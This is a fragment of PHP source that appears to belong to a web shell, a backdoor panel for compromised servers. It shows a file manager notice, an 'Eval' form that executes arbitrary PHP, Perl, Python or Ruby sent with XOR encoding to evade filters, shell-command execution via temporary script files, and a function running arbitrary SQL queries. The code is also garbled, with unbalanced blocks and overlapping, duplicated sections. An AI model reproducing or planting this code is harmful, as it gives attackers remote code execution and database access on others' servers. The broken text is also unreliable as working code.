echo "\n\t<form action='#File Manager' method='post'>\n\t\t<input type='hidden' name='dir' value='" . $_POST["old_dir"] . "' />\n\t\t<input type='submit' value='Go Back' class='a_button' />\n\t</form>\n\t<p class='danger'>`{$dir}` is not read readable or doesn't exist!</p>";
}
echo "\n<h3><A NAME='Eval' href='#Eval'>Eval</A></h3>\n\n<p class='danger'>DO NOT include '<?php' at the beginning or '?>' at the end for Php.</p>\n\n<table class='flat-table' style='table-layout: fixed;'>\n\t<tr>\n\t\t<form action='#Eval 'method='post' onsubmit=\"xorencr(['eval_code'])\">\n\t\t\t<td style='padding:1%;'>\n\t\t\t\t<input type='hidden' name='dir' value='" . xor_this($dir) . "' />\n\t\t\t\t<textarea name='eval_code' id='eval_code'></textarea><br/>\n\t\t\t\t<input type='submit' value='Execute'/>\n\t\t\t\t<select name='eval_lang'>\n\t\t\t\t\t<option value='" . xor_this("Php") . "'>Php</option>";
if ($_SESSION["perl"] != null) {
echo "<option value='" . xor_this("Perl") . "'>Perl</option>";
}
if ($_SESSION["python"] != null) {
echo "<option value='" . xor_this("Python") . "'>Python</option>";
}
if ($_SESSION["ruby"] != null) {
echo "<option value='" . xor_this("Ruby") . "'>Ruby</option>";
}
echo "\n\t\t\t\t</select>\n\t\t\t\t<input name='output_needed' type='checkbox'/>Show Output\n\t\t\t</td>\n\t\t</form>\n\t</tr>";
if (isset($_POST["eval_code"])) {
$eval_code = unxor_this($_POST["eval_code"]);
$eval_lang = unxor_this($_POST["eval_lang"]);
if (isset($_POST["output_needed"])) {
$output_needed = True;
} else {
$output_needed = False;
}
echo "<tr><td>";
if ($eval_lang == "Php") {
execute_php($eval_code, $output_needed);
} else {
if ($eval_lang == "Perl") {
echo execute_script($eval_code, $_SESSION["perl"], "pl", $output_needed);
} else {
if ($eval_lang == "Python") {
echo execute_script($eval_code, $_SESSION["python"], "py", $output_needed);
} else {
}
$temporary = soft_exists("C:\\Ruby21-x32\\bin:ruby");
if (!strpos($temporary, 'INFO') !== false && $temporary != "") {
$ruby = str_replace("\n", "", $temporary);
echo "<option value='ruby'>Ruby32</option>";
}
$temporary = soft_exists("C:\\Ruby21-x64\\bin:ruby");
if (!strpos($temporary, 'INFO') !== false && $temporary != "") {
$ruby = str_replace("\n", "", $temporary);
echo "<option value='ruby'>Ruby64</option>";
}
}
}
echo "\n\t</select>\n\t<input type=\"submit\" name=\"run\" value=\"run\" onclick=\"return xorencr2(this.form, this.form.language, this.form.eval);\"/>\n</form>";
if (isset($_POST["run"])) {
$decEval = unxor_this($_POST["eval"]);
if ($_POST["language"] == "php") {
runPHP($decEval);
}
if ($proc_open == True || $popen == True || $shell_exec == True || $exec == True || $system == True || $passthru == True || $cgi == True || $shsh == True) {
if (isset($_SESSION["Windows"])) {
if ($_POST["language"] == "python") {
if ($python != "") {
$filename = $write_read_dir . rand(1, 1000) . ".py";
file_put_contents($filename, $decEval);
$command = "{$python} {$filename}";
evalRel($command);
unlink($filename);
}
}
if ($_POST["language"] == "ruby") {
function execute_sql($sql_query)
{
$sql_query = unxor_this($sql_query);
//reconnecting each time because persistent connections were added in php v5.3 so we simply can't risk it...
$link = mysqli_connect("localhost", $_SESSION["sql_user"], $_SESSION["sql_pass"], $_SESSION["sql_database"]);
if ($result = mysqli_query($link, $sql_query)) {
$col_cnt = mysqli_field_count($link);
if ($col_cnt != 0) {
$return_value = "";
while ($row = mysqli_fetch_row($result)) {
for ($i = 0; $i < $col_cnt; $i++) {
$return_value .= htmlspecialchars($row[$i]) . " ";
}
$return_value .= "\n";
}
mysqli_free_result($result);
} else {
$return_value = "";
}
} else {
$return_value = mysqli_error($link);
}
mysqli_close($link);
return $return_value;
}